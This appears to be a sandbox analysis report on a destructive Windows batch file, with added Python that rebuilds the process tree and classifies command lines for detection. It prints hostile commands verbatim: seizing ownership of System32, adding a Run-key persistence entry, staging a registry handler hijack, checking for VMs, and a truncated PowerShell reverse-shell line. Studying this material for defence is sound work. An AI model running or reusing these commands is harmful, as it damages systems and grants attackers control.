Analysis
max time kernel: 110s
max time network: 206s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/09/2024, 06:47
Static task: static1
Behavioral task behavioral1: custom.bat on win10-20240404-en
Behavioral task behavioral2: custom.bat on win7-20240903-en
Behavioral task behavioral3: custom.bat on win10v2004-20240802-en (this report)
Behavioral task behavioral4: custom.bat on win11-20240802-en
General
Target: custom.bat
Size: 4KB
MD5: 1c63745d54962d205bb3ae879bea1ed4
SHA1: a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256: 396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512: 129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP: 96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures

Possible privilege escalation attempt (4 IoCs)
  pid    Process
  1344   takeown.exe
  3972   takeown.exe
  1296   icacls.exe
  636    icacls.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  Process
  Key value queried  \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation  cmd.exe

Modifies file permissions (1 TTP, 4 IoCs)
  pid    Process
  1296   icacls.exe
  636    icacls.exe
  1344   takeown.exe
  3972   takeown.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                                                            Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"  reg.exe

Command and Scripting Interpreter: PowerShell (3 IoCs)
  pid    Process
  464    powershell.exe
  3008   powershell.exe
  1148   powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (2 IoCs)
  pid    Process
  992    timeout.exe
  3068   timeout.exe

Gathers system information (1 TTP, 3 IoCs)
  Runs systeminfo.exe.
  pid    Process
  1400   systeminfo.exe
  2548   systeminfo.exe
  1836   systeminfo.exe

Modifies registry class (10 IoCs)
  description      ioc                                                                                                                                                                  Process
  Key created      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell                                                                                    reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open                                                                               reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open                                                                               reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell                                                                                    reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile                                                                                          reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command                                                                       reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile                                                                                          reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings                                                                                   cmd.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\mscfile\shell\open\command                                                                       reg.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid    Process
  1148   powershell.exe
  1148   powershell.exe
  464    powershell.exe
  464    powershell.exe
  464    powershell.exe
  3008   powershell.exe
  3008   powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description                      pid    Process
  Token: SeDebugPrivilege          1148   powershell.exe
  Token: SeTakeOwnershipPrivilege  1344   takeown.exe
  Token: SeDebugPrivilege          464    powershell.exe
  Token: SeTakeOwnershipPrivilege  3972   takeown.exe
  Token: SeDebugPrivilege          3008   powershell.exe

Suspicious use of WriteProcessMemory (42 IoCs)
  description                        pid    Process  procid_target
  PID 4088 wrote to memory of 1084   4088   cmd.exe  84
  PID 4088 wrote to memory of 1084   4088   cmd.exe  84
  PID 4088 wrote to memory of 1148   4088   cmd.exe  85
  PID 4088 wrote to memory of 1148   4088   cmd.exe  85
  PID 4088 wrote to memory of 992    4088   cmd.exe  98
  PID 4088 wrote to memory of 992    4088   cmd.exe  98
  PID 4088 wrote to memory of 2660   4088   cmd.exe  99
  PID 4088 wrote to memory of 2660   4088   cmd.exe  99
  PID 4088 wrote to memory of 4872   4088   cmd.exe  100
  PID 4088 wrote to memory of 4872   4088   cmd.exe  100
  PID 4088 wrote to memory of 3068   4088   cmd.exe  103
  PID 4088 wrote to memory of 3068   4088   cmd.exe  103
  PID 4872 wrote to memory of 1344   4872   cmd.exe  104
  PID 4872 wrote to memory of 1344   4872   cmd.exe  104
  PID 4088 wrote to memory of 4508   4088   cmd.exe  106
  PID 4088 wrote to memory of 4508   4088   cmd.exe  106
  PID 4088 wrote to memory of 1400   4088   cmd.exe  107
  PID 4088 wrote to memory of 1400   4088   cmd.exe  107
  PID 4088 wrote to memory of 1664   4088   cmd.exe  108
  PID 4088 wrote to memory of 1664   4088   cmd.exe  108
  PID 4088 wrote to memory of 2548   4088   cmd.exe  111
  PID 4088 wrote to memory of 2548   4088   cmd.exe  111
  PID 4088 wrote to memory of 1128   4088   cmd.exe  112
  PID 4088 wrote to memory of 1128   4088   cmd.exe  112
  PID 4088 wrote to memory of 1836   4088   cmd.exe  113
  PID 4088 wrote to memory of 1836   4088   cmd.exe  113
  PID 4088 wrote to memory of 3820   4088   cmd.exe  114
  PID 4088 wrote to memory of 3820   4088   cmd.exe  114
  PID 4088 wrote to memory of 464    4088   cmd.exe  115
  PID 4088 wrote to memory of 464    4088   cmd.exe  115
  PID 4088 wrote to memory of 3508   4088   cmd.exe  116
  PID 4088 wrote to memory of 3508   4088   cmd.exe  116
  PID 4088 wrote to memory of 3972   4088   cmd.exe  117
  PID 4088 wrote to memory of 3972   4088   cmd.exe  117
  PID 4872 wrote to memory of 1296   4872   cmd.exe  118
  PID 4872 wrote to memory of 1296   4872   cmd.exe  118
  PID 4872 wrote to memory of 636    4872   cmd.exe  119
  PID 4872 wrote to memory of 636    4872   cmd.exe  119
  PID 4872 wrote to memory of 2360   4872   cmd.exe  120
  PID 4872 wrote to memory of 2360   4872   cmd.exe  120
  PID 4872 wrote to memory of 3008   4872   cmd.exe  121
  PID 4872 wrote to memory of 3008   4872   cmd.exe  121
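The WriteProcessMemory rows above are, in this trace, the record of which process spawned which: the two cmd.exe instances (4088 and 4872) write into each child they create before it starts running, which is ordinary child creation rather than code injection, and every spawn is listed twice. That makes the signature a usable source for the process tree when a report arrives flattened like this one. The following Python is an added example, not part of the Triage report; the row text is copied verbatim from the signature, the parser, deduplication and tree rendering are my own.

```python
import re
from collections import defaultdict

# The 42 rows of "Suspicious use of WriteProcessMemory", copied from the report
# (run together on a few lines, as the report renders them).
WPM_ROWS = (
    "PID 4088 wrote to memory of 1084 4088 cmd.exe 84 PID 4088 wrote to memory of 1084 4088 cmd.exe 84 "
    "PID 4088 wrote to memory of 1148 4088 cmd.exe 85 PID 4088 wrote to memory of 1148 4088 cmd.exe 85 "
    "PID 4088 wrote to memory of 992 4088 cmd.exe 98 PID 4088 wrote to memory of 992 4088 cmd.exe 98 "
    "PID 4088 wrote to memory of 2660 4088 cmd.exe 99 PID 4088 wrote to memory of 2660 4088 cmd.exe 99 "
    "PID 4088 wrote to memory of 4872 4088 cmd.exe 100 PID 4088 wrote to memory of 4872 4088 cmd.exe 100 "
    "PID 4088 wrote to memory of 3068 4088 cmd.exe 103 PID 4088 wrote to memory of 3068 4088 cmd.exe 103 "
    "PID 4872 wrote to memory of 1344 4872 cmd.exe 104 PID 4872 wrote to memory of 1344 4872 cmd.exe 104 "
    "PID 4088 wrote to memory of 4508 4088 cmd.exe 106 PID 4088 wrote to memory of 4508 4088 cmd.exe 106 "
    "PID 4088 wrote to memory of 1400 4088 cmd.exe 107 PID 4088 wrote to memory of 1400 4088 cmd.exe 107 "
    "PID 4088 wrote to memory of 1664 4088 cmd.exe 108 PID 4088 wrote to memory of 1664 4088 cmd.exe 108 "
    "PID 4088 wrote to memory of 2548 4088 cmd.exe 111 PID 4088 wrote to memory of 2548 4088 cmd.exe 111 "
    "PID 4088 wrote to memory of 1128 4088 cmd.exe 112 PID 4088 wrote to memory of 1128 4088 cmd.exe 112 "
    "PID 4088 wrote to memory of 1836 4088 cmd.exe 113 PID 4088 wrote to memory of 1836 4088 cmd.exe 113 "
    "PID 4088 wrote to memory of 3820 4088 cmd.exe 114 PID 4088 wrote to memory of 3820 4088 cmd.exe 114 "
    "PID 4088 wrote to memory of 464 4088 cmd.exe 115 PID 4088 wrote to memory of 464 4088 cmd.exe 115 "
    "PID 4088 wrote to memory of 3508 4088 cmd.exe 116 PID 4088 wrote to memory of 3508 4088 cmd.exe 116 "
    "PID 4088 wrote to memory of 3972 4088 cmd.exe 117 PID 4088 wrote to memory of 3972 4088 cmd.exe 117 "
    "PID 4872 wrote to memory of 1296 4872 cmd.exe 118 PID 4872 wrote to memory of 1296 4872 cmd.exe 118 "
    "PID 4872 wrote to memory of 636 4872 cmd.exe 119 PID 4872 wrote to memory of 636 4872 cmd.exe 119 "
    "PID 4872 wrote to memory of 2360 4872 cmd.exe 120 PID 4872 wrote to memory of 2360 4872 cmd.exe 120 "
    "PID 4872 wrote to memory of 3008 4872 cmd.exe 121 PID 4872 wrote to memory of 3008 4872 cmd.exe 121"
)

# "PID <writer> wrote to memory of <child> <writer> <writer image> <procid_target>";
# the back-reference enforces that the pid column repeats the writer pid.
ROW_RE = re.compile(
    r"PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) (?P=ppid) (?P<pname>\S+) (?P<target>\d+)"
)


def parse_rows(text):
    """One (parent pid, child pid, parent image, procid_target) tuple per row; duplicates kept."""
    return [(int(m["ppid"]), int(m["cpid"]), m["pname"], int(m["target"]))
            for m in ROW_RE.finditer(text)]


def build_tree(rows):
    """Parent pid -> distinct child pids in first-seen order (collapses the doubled rows)."""
    tree = defaultdict(list)
    for ppid, cpid, _, _ in rows:
        if cpid not in tree[ppid]:
            tree[ppid].append(cpid)
    return dict(tree)


def parent_images(rows):
    """Image name of every process that spawned something (only parents are named in these rows)."""
    return {ppid: pname for ppid, _, pname, _ in rows}


def roots(tree):
    """Pids that spawn children but were never spawned by a listed parent: the top of the tree."""
    children = {c for kids in tree.values() for c in kids}
    return sorted(p for p in tree if p not in children)


def render(tree, images, pid, depth=0, out=None):
    """Indented text tree; leaf images are unknown from these rows alone, so only parents are labelled."""
    out = [] if out is None else out
    out.append("  " * depth + f"{pid} {images.get(pid, '')}".rstrip())
    for child in tree.get(pid, []):
        render(tree, images, child, depth + 1, out)
    return out


if __name__ == "__main__":
    rows = parse_rows(WPM_ROWS)
    tree = build_tree(rows)
    print(f"{len(rows)} rows -> {sum(len(v) for v in tree.values())} distinct spawns")
    for root in roots(tree):
        print("\n".join(render(tree, parent_images(rows), root)))
```

Running it shows a single root (4088, the cmd.exe that ran custom.bat) with 16 direct children and one nested cmd.exe (4872, full_destruction.bat) with 5 of its own, which is exactly the shape of the Processes section that follows. The parser is deliberately strict about the repeated writer pid; a row where that column differs would point at a genuine cross-process write and should not be folded into the tree silently.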
Processes (indentation shows parent/child depth)

C:\Windows\system32\cmd.exe  [PID 4088]
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\mode.com  [PID 1084]
      cmdline: mode con: cols=800 lines=60

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1148]
      cmdline: powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\timeout.exe  [PID 992]
      cmdline: timeout /t 5
      - Delays execution with timeout.exe

    C:\Windows\system32\reg.exe  [PID 2660]
      cmdline: reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
      - Modifies registry class

    C:\Windows\system32\cmd.exe  [PID 4872]
      cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\takeown.exe  [PID 1344]
          cmdline: takeown /f C:\Windows\System32\* /r /d y
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\icacls.exe  [PID 1296]
          cmdline: icacls C:\Windows\System32\* /grant Admin:F /t /c
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe  [PID 636]
          cmdline: icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\mode.com  [PID 2360]
          cmdline: mode con: cols=800 lines=60

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 3008]
          cmdline: powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\timeout.exe  [PID 3068]
      cmdline: timeout /t 5
      - Delays execution with timeout.exe

    C:\Windows\system32\reg.exe  [PID 4508]
      cmdline: reg delete "HKCU\Software\Classes\mscfile" /f
      - Modifies registry class

    C:\Windows\system32\systeminfo.exe  [PID 1400]
      cmdline: systeminfo
      - Gathers system information

    C:\Windows\system32\findstr.exe  [PID 1664]
      cmdline: findstr /i "VirtualBox"

    C:\Windows\system32\systeminfo.exe  [PID 2548]
      cmdline: systeminfo
      - Gathers system information

    C:\Windows\system32\findstr.exe  [PID 1128]
      cmdline: findstr /i "VMware"

    C:\Windows\system32\systeminfo.exe  [PID 1836]
      cmdline: systeminfo
      - Gathers system information

    C:\Windows\system32\findstr.exe  [PID 3820]
      cmdline: findstr /i "Hyper-V"

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 464]
      cmdline: powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\reg.exe  [PID 3508]
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
      - Adds Run key to start application

    C:\Windows\system32\takeown.exe  [PID 3972]
      cmdline: takeown /f C:\Windows\System32\* /r /d y
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
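The command lines in the tree above are the part of this report worth turning into detections, and a few of them deserve a caveat before you map them. The reg add on HKCU\Software\Classes\mscfile\shell\open\command is the per-user handler abused by the well-known eventvwr.exe UAC bypass, but no eventvwr.exe launch appears in this trace: the script writes the handler, runs full_destruction.bat directly through cmd.exe, then deletes the key, so treat the hijack as staged rather than observed to fire. Each systeminfo is paired with a findstr for a hypervisor name, which is the usual systeminfo | findstr VM check rendered as two processes. The PowerShell TCPClient target 192.168.1.100:4444 is a private address, so that callback cannot leave the local network. The "Checks computer location settings" hit is raised on cmd.exe reading Geo\Nation, a key the console reads during normal locale initialisation, so on its own it is weak evidence of geofencing. The following Python classifier is an added example and not part of the Triage output: the command lines are copied from the tree above (the one for PID 464 is truncated in the report and is kept as rendered), while the regex rules and the ATT&CK technique IDs are my own mapping, not taken from the report.

```python
import re
import ipaddress
from collections import Counter

# Command lines copied from the process tree above, keyed by PID.
# PID 464 is truncated in the report itself; only the rendered prefix is kept.
PROCESSES = {
    4088: r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"',
    1084: "mode con: cols=800 lines=60",
    1148: "powershell -Command \"$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')\"",
    992: "timeout /t 5",
    2660: r'reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f',
    4872: r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "',
    1344: r"takeown /f C:\Windows\System32\* /r /d y",
    1296: r"icacls C:\Windows\System32\* /grant Admin:F /t /c",
    636: r"icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c",
    2360: "mode con: cols=800 lines=60",
    3008: "powershell -Command \"$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')\"",
    3068: "timeout /t 5",
    4508: r'reg delete "HKCU\Software\Classes\mscfile" /f',
    1400: "systeminfo",
    1664: 'findstr /i "VirtualBox"',
    2548: "systeminfo",
    1128: 'findstr /i "VMware"',
    1836: "systeminfo",
    3820: 'findstr /i "Hyper-V"',
    464: "powershell -Command \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream();",
    3508: r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f',
    3972: r"takeown /f C:\Windows\System32\* /r /d y",
}

# (label, regex over the command line, ATT&CK technique). The mapping is mine.
RULES = [
    ("Registry Run key persistence", r'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"', "T1547.001"),
    ("mscfile open-handler hijack (eventvwr UAC-bypass staging)", r'reg add "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"', "T1548.002"),
    ("mscfile handler removed (cleanup)", r'reg delete "HKCU\\Software\\Classes\\mscfile"', "T1112"),
    ("Ownership of System32 taken", r"^takeown .*System32", "T1222.001"),
    ("Full-control ACL granted on System32", r"^icacls .*System32.*/grant", "T1222.001"),
    ("System information discovery", r"^systeminfo", "T1082"),
    ("Hypervisor string check (VM evasion)", r'^findstr /i "(VirtualBox|VMware|Hyper-V)"', "T1497.001"),
    ("Sleep via timeout.exe", r"^timeout /t \d+", "T1497.003"),
    ("PowerShell TCP client (reverse-shell pattern)", r"TCPClient\('(?P<host>[\d.]+)',\s*(?P<port>\d+)\)", "T1059.001"),
    ("PowerShell SendKeys (console manipulation)", r"SendKeys\(", "T1059.001"),
]


def classify(cmdline):
    """Every rule the command line matches, as (label, technique, named groups)."""
    hits = []
    for label, pattern, technique in RULES:
        m = re.search(pattern, cmdline, re.IGNORECASE)
        if m:
            hits.append((label, technique, m.groupdict()))
    return hits


def classify_all(processes):
    return {pid: classify(cmd) for pid, cmd in processes.items()}


def technique_counts(findings):
    """How many processes hit each technique (a process can contribute to several)."""
    return Counter(t for hits in findings.values() for _, t, _ in hits)


def unclassified(findings):
    """PIDs no rule fired on; review these by hand instead of assuming they are benign."""
    return sorted(pid for pid, hits in findings.items() if not hits)


def extract_c2(cmdline):
    """(host, port) from a .NET TCPClient construction, or None."""
    m = re.search(r"TCPClient\('(?P<host>[\d.]+)',\s*(?P<port>\d+)\)", cmdline)
    return (m["host"], int(m["port"])) if m else None


def c2_is_private(cmdline):
    """True when the callback target is RFC 1918 / loopback space and cannot leave the LAN."""
    c2 = extract_c2(cmdline)
    return bool(c2) and ipaddress.ip_address(c2[0]).is_private


if __name__ == "__main__":
    findings = classify_all(PROCESSES)
    for pid, hits in findings.items():
        for label, technique, groups in hits:
            extra = f" {groups}" if groups else ""
            print(f"{pid:>5}  {technique:<10} {label}{extra}")
    print("unclassified:", unclassified(findings))
    print("by technique:", dict(technique_counts(findings)))
```

The rules anchor on the start of the command line where the binary name is the discriminator (takeown, icacls, systeminfo, findstr, timeout) and on the exact registry path otherwise, so a legitimate `icacls` on a user directory or a `reg add` under a different hive does not fire. The four processes left unclassified are the two cmd.exe hosts and the two mode.com calls, which is what you want: the classifier reports what it cannot explain instead of labelling everything.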
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 1KB
  MD5: a2b24af1492f112d2e53cb7415fda39f
  SHA1: dbfcee57242a14b60997bd03379cc60198976d85
  SHA256: fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
  SHA512: 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Filesize: 948B
  MD5: 310c4040e72365ea4993113fd77611ce
  SHA1: 3dbdc46110454c95ef61e3e88d0e8cb7f90ea5a6
  SHA256: 11223ab7bdbe8d600e56b0d681f1c5109b7a8bd1bdf03a16975c8e77a8dd131f
  SHA512: deae0c82677b8202d26faa751eeeac868050745d3aedc1ac297d13d6b92ce434e8d5c620eb39b8f87647ba0b9a8f46b89a14b664f6f9a58c5c03834c5afc5bee

Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 285B
  MD5: 4577f08330df24a350ff523ec87bf38e
  SHA1: 5bd1a1b1b8ca3b007102a75f7abaf72348955cf2
  SHA256: 5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
  SHA512: ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2